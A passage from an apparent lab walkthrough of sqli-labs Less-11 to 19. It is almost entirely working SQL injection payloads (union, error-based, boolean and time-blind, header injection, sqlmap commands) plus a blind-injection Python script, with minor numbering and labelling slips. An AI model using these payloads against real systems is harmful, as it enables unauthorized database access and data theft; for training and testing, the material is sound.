    column = 'select column_name from information_schema.columns where table_name="table_name"'
    result = ''
    for i in range(1, 30):
        # try every printable code from 48 to 122 inclusive for position i
        for j in range(48, 123):
            payload = '" and if(ascii(substr(({} limit 0,1),{},1))={},sleep(2),1)--+'.format(database, i, j)
            stime = time.time()
            r = requests.get(url + payload)
            etime = time.time()
            if etime - stime >= 2:
                # a delay of at least 2 seconds means the guessed code is correct
                result += chr(j)
                print(result)
                break
        else:
            # no code matched, so the string has ended
            break
Less-11 POST - Error Based - Single quotes- String (error-based POST single-quote string injection)
1. Check whether an injection point exists
uname='&passwd=a&submit=Submit
Error displayed => injection point exists
2. Determine the parameter type
uname=1 or 1=1 #&passwd=a&submit=Submit
Normal output
uname=1" or 1=1 #&passwd=a&submit=Submit
Error displayed => string type
3. Find the closing sequence for the parameter
uname=1" or 1=1 #&passwd=a&submit=Submit
Error displayed
uname=1") or 1=1#&passwd=a&submit=Submit
Login succeeds => closing sequence found
4. Find how many columns the backend table has
uname=' or 1=1 order by 2#&passwd=a&submit=Submit
Normal output
uname=' or 1=1 order by 3#&passwd=a&submit=Submit
Error displayed => 2 columns
5. Run a union select to find the output positions
uname='union select 1,2#&passwd=a&submit=Submit
6. Get the current database and version
uname='union select database(),version()#&passwd=a&submit=Submit
7. List the tables in the database
uname='union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=a&submit=Submit
8. List the columns in the DPXE2rot table
uname='union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="DPXE2rot" #&passwd=a&submit=Submit
9. Read the flag column from the table
uname='union select 1,flag from DPXE2rot limit 3,1 #&passwd=a&submit=Submit
Less-12 POST - Error Based - Double quotes- String-with twist (error-based POST double-quote string injection with a twist)
1. Check whether an injection point exists
uname=1'&passwd=a&submit=Submit
No output
uname=1"passwd=a&submit=Submit
Error displayed => injection point exists
2. Determine the parameter type
uname=1 or 1=1#&passwd=a&submit=Submit
No output
uname=1" or 1=1#&passwd=a&submit=Submit
Error displayed => string type
3. Find the closing sequence for the parameter
uname=1' or 1=1#&passwd=a&submit=Submit
No output
uname=1" or 1=1#&passwd=a&submit=Submit
Error displayed => the first closing character is correct
uname=1") or 1=1#&passwd=a&submit=Submit
Login succeeds => closing sequence found
4. Find how many columns the backend table has
uname=1") order by 2#&passwd=a&submit=Submit
No output
uname=1") order by 3#&passwd=a&submit=Submit
Error displayed => 2 columns
5. Run a union select to find the output positions
uname=1") union select 1,2#&passwd=a&submit=Submit
6. Use sqlmap for the injection
6.1 Capture the request with Burp and save it in the same directory as sqlmap.
6.2 Use sqlmap to find the injection point
python sqlmap.py -r burp.txt --answers="extending=N" --threads=20 --level=5 --risk=3
6.4 Use sqlmap to get the current database and version
python sqlmap.py -r burp.txt --batch --threads=20 --level=5 --risk=3 --dbs
7. List the tables in the database
python sqlmap.py -r burp.txt --batch --threads=20 --level=5 --risk=3 -D "security" --tables
8. List the columns in the 5oIWbCUu table
python sqlmap.py -r burp.txt --batch --threads=20 --level=5 --risk=3 -D "security" -T "5oIWbCUu" --columns
9. Read the flag column from the table
python sqlmap.py -r burp.txt --batch --threads=20 --level=5 --risk=3 -D "security" -T "5oIWbCUu" -C "flag" --dump
Less-13 POST - Double Injection - Single quotes- String -twist (POST single-quote double-query injection with a twist)
1. Check whether an injection point exists
uname=a'&passwd=a&submit=Submit
Error displayed => injection point exists
2. Determine the parameter type
uname=1 or 1=1#&passwd=a&submit=Submit
No output
uname=1' or 1=1#&passwd=a&submit=Submit
Error displayed => string type
3. Find the closing sequence for the parameter
uname=1') or 1=1#&passwd=a&submit=Submit
Login succeeds
uname=1') or 1=2#&passwd=a&submit=Submit
Login fails => closing sequence found
4. Find how many columns the backend table has
uname=1') order by 2#&passwd=a&submit=Submit
No output
uname=1') order by 3#&passwd=a&submit=Submit
Error displayed => 2 columns
5. Use error-message injection to get the database
uname=1') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #&passwd=a&submit=Submit
7. List the tables in the database
uname=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #&passwd=a&submit=Submit
8. List the columns in the sPI5qPTd table
uname=1') and updatexml(1,concat(0x7e,(select flag from sPI5qPTd limit 3,1),0x7e),1) #&passwd=a&submit=Submit
Less-14 POST - Double Injection - Single quotes- String -twist (POST single-quote double-query injection with a twist)
This level uses error-message injection
1. Check whether an injection point exists
uname=1"&passwd=a&submit=Submit
Error displayed => injection point exists
2. Determine the parameter type
uname=1 or 1=1#&passwd=a&submit=Submit
No output
uname=1" or 1=1#&passwd=a&submit=Submit
Login succeeds => string type
3. Find the closing sequence for the parameter
uname=1" or 1=1#&passwd=a&submit=Submit
Login succeeds => closing sequence found
4. Find how many columns the backend table has
uname=1" order by 2#&passwd=a&submit=Submit
No output
uname=1" order by 3#&passwd=a&submit=Submit
Error displayed => 2 columns
5. Error-message injection to get the current database
uname=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=a&submit=Submit
6. List the tables in the database
uname=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&passwd=a&submit=Submit
7. List the columns in the r1lPpzMz table
uname=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="r1lPpzMz"),0x7e),1)#&passwd=a&submit=Submit
8. Read the flag column from the table
uname=1" and updatexml(1,concat(0x7e,(select flag from r1lPpzMz limit 0,1),0x7e),1)#&passwd=a&submit=Submit
less-15 POST - Blind- Boolian/time Based - Single quotes (boolean/time-delay POST single-quote blind injection)
This level uses boolean injection
1. Check whether an injection point exists
uname=a'&passwd=a&submit=Submit
Login fails
uname=a' or 1=1#&passwd=a&submit=Submit
Login succeeds => injection point exists
2. Determine the parameter type
uname=1 or 1=1#&passwd=a&submit=Submit
Login fails
uname=1' or 1=1#&passwd=a&submit=Submit
Login succeeds => string type
3. Find the closing sequence for the parameter
uname=1' or 1=1#&passwd=a&submit=Submit
Login succeeds
uname=1' or 1=2#&passwd=a&submit=Submit
Login fails => closing sequence found
4. Find how many columns the backend table has
uname=1' or 1=1 order by 2 #&passwd=a&submit=Submit
Login succeeds
uname=1' or 1=1 order by 1 #&passwd=a&submit=Submit
Login fails => 3 columns
5. There is no output, so use boolean blind injection; determine the database name length
uname=1' or length(database())=8 #&passwd=a&submit=Submit
6. Get the current database
uname=1' or left(database(),1)='s' #&passwd=a&submit=Submit
7. List the tables in the database
uname=1' or ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n #&passwd=a&submit=Submit
a is the table index starting from 0, b is the character position starting from 1, and n is the decimal ASCII value
8. List the columns in the 0tUdVIPy table
uname=1' or ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name ="0tUdVIPy" limit 0,1),1,1))>1 #&passwd=a&submit=Submit
9. Read the flag column from the table
uname=1' or ascii(substr((select flag from 0tUdVIPy limit 0,1),1,1))>1 #&passwd=a&submit=Submit
Less-16 POST - Blind- Boolian/Time Based - Double quotes (boolean/time-delay POST double-quote blind injection)
This level uses time-delay injection
1. Check whether an injection point exists
uname=a") or sleep(3) #&passwd=a&submit=Submit
Delayed response => injection point exists
2. Determine the parameter type
uname=1 or sleep(3) #&passwd=a&submit=Submit
Normal output => string type
3. Find the closing sequence for the parameter
uname=a") or sleep(3) #&passwd=a&submit=Submit
Delayed response => closing sequence found
4. Guess the database name length
uname=1") or if(length(database())=7,1,sleep(5)) #&passwd=a&submit=Submit
Delayed response
uname=1") or if(length(database())=8,1,sleep(5)) #&passwd=a&submit=Submit
Normal output => 8 characters
6. Get the current database
uname=1") or If(ascii(substr(database(),1,1))=114,1,sleep(5)) #&passwd=a&submit=Submit
Delayed response
uname=1") or If(ascii(substr(database(),1,1))=115,1,sleep(5)) #&passwd=a&submit=Submit
Normal output => first character ascii=115
7. List the tables in the database
uname=1") or If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
8. List the columns in the users table
uname=1") or If(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='ENR4qOJL' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
9. Read the flag column from the table
uname=1") or If(ascii(substr((select flag from ENR4qOJL limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit
Less-17 POST - Update Query- Error Based - String (error-based POST injection in an update query)
In this level we need to know the username and inject through the password value before the following steps can proceed.
1. Check whether an injection point exists
uname=admin&passwd=a'&submit=Submit
Error displayed => injection point exists
2. Determine the parameter type
uname=admin&passwd=1 and 1=1&submit=Submit
Normal output => string type
4. Get the current database
uname=admin&passwd=1' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
5. List the tables in the database
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#&submit=Submit
6. List the columns in the ZULae9ih table
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='ZULae9ih' limit 1,1),0x7e),1)#&submit=Submit
7. Read the flag column from the table
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select flag from ZULae9ih limit 3,1),0x7e),1)#&submit=Submit
8. The output is truncated
uname=admin&passwd=1' and updatexml(1,concat(0x7e,right((select flag from ZULae9ih limit 3,1) ,31),0x7e),1) #&submit=Submit
Less-18 POST - Header Injection - Uagent field - Error based (error-based POST injection via the User-Agent header)
Requires a successful login
1. Check whether an injection point exists
User-Agent: '
2. Get the current database and version
User-Agent: ' and extractvalue(1,concat(0x7e,database(),0x7e)) and '
3. List the tables in the database
' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '
4. List the columns in the B8COTOy3 table
' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='B8COTOy3' limit 1,1),0x7e)) and '
5. Read the flag column from the table
' and extractvalue(1,concat(0x7e,right((select flag from B8COTOy3 limit 3,1),31),0x7e)) and '
Less-19 POST - Header Injection - Referer field - Error based (error-based POST injection via the Referer header)
1. Check whether an injection point exists
Referer:'
2. Get the current database and version
Referer:' and extractvalue(1,concat(0x7e,database(),0x7e)) and '
3. List the tables in the database
Referer:' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '
4. List the columns in the 9J7dKBsE table
Referer:' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='9J7dKBsE' limit 1,1),0x7e)) and '
5. Read the flag column from the table
Referer:' and extractvalue(1,concat(0x7e,right((select flag from 9J7dKBsE limit 3,1),31),0x7e)) and '